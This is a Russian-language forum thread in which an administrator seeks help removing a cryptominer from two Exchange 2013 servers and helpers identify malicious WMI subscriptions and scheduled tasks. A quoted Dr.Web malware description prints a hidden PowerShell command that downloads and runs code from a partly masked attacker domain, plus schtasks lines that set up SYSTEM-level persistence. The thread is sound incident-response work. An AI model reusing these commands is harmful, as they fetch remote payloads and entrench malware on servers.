запуск майнера на серверах с MS Exchange 2013

Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.
процесс rundll32.exe (с внедренным майнером) закрыли перед созданием  образа автозапуска?
может переделаете образ автозапуска с активным процессом, чтобы можно было увидеть какой процесс ему внедряет майнера?

пока что видно несколько заданий, запускаемых из WMI:
WMI:\\.\ROOT\SUBSCRIPTION\.[F5BR1LMHB]
WMI:\\.\ROOT\SUBSCRIPTION\.[FKB6RDNGR]
WMI:\\.\ROOT\SUBSCRIPTION\.[FOQ6EDPWMK]
WMI:\\.\ROOT\SUBSCRIPTION\.[FUTWMFBRLE4]

+
по второму серверу сделайте образ автозапуска, чтобы было с чем сравнить
Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
Цитата
Владимир Шариков написал:
Запускается в 2:30 каждый день

В Задачах:

Полное имя                  T.NETCATKIT.COM
Имя файла                   T.NETCATKIT.COM
Тек. статус                 в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\T.NETCATKIT.COM
                           
https://www.virustotal.com/gui/url/1d48c0de95f50662b0a356670209877bf3938263f8921484­58963b4f09b82ad2/detection
да, T.NETCATKIT.COM тоже может быть частью заданий злоумышленников
Цитата
Владимир Шариков написал:
Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
не нужно,
как процесс запустится, сделайте образы автозапуска, потом процессы можно закрыть, вечером посмотрим образы, и напишем скрипты очистки
drweb.ru


Цитата
Trojan.DownLoader38.26327

Добавлен в вирусную базу Dr.Web: 2021-04-08

Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы

   <SYSTEM32>\tasks\t.netcatkit.com
   <SYSTEM32>\tasks\xr6ziynzn

Вредоносные функции
Загружает

   http://+t.###+catkit.com/a.jsp?re################################ as %username%

Сетевая активность
UDP

   DNS ASK t.###catkit.com

Другое
Создает и запускает на исполнение

   '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном)

Запускает на исполнение

   '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com
   '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD"
   '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN
+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
да, это было в предыдущей атаке Proxylogon на эти же сервера,
но здесь еще есть новые задания WMI, потому лучше полный образ получить с нагруженным процессом rundll32.exe
и второй образ проверить, что в нем есть
В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?  
Читают тему (гостей: 3)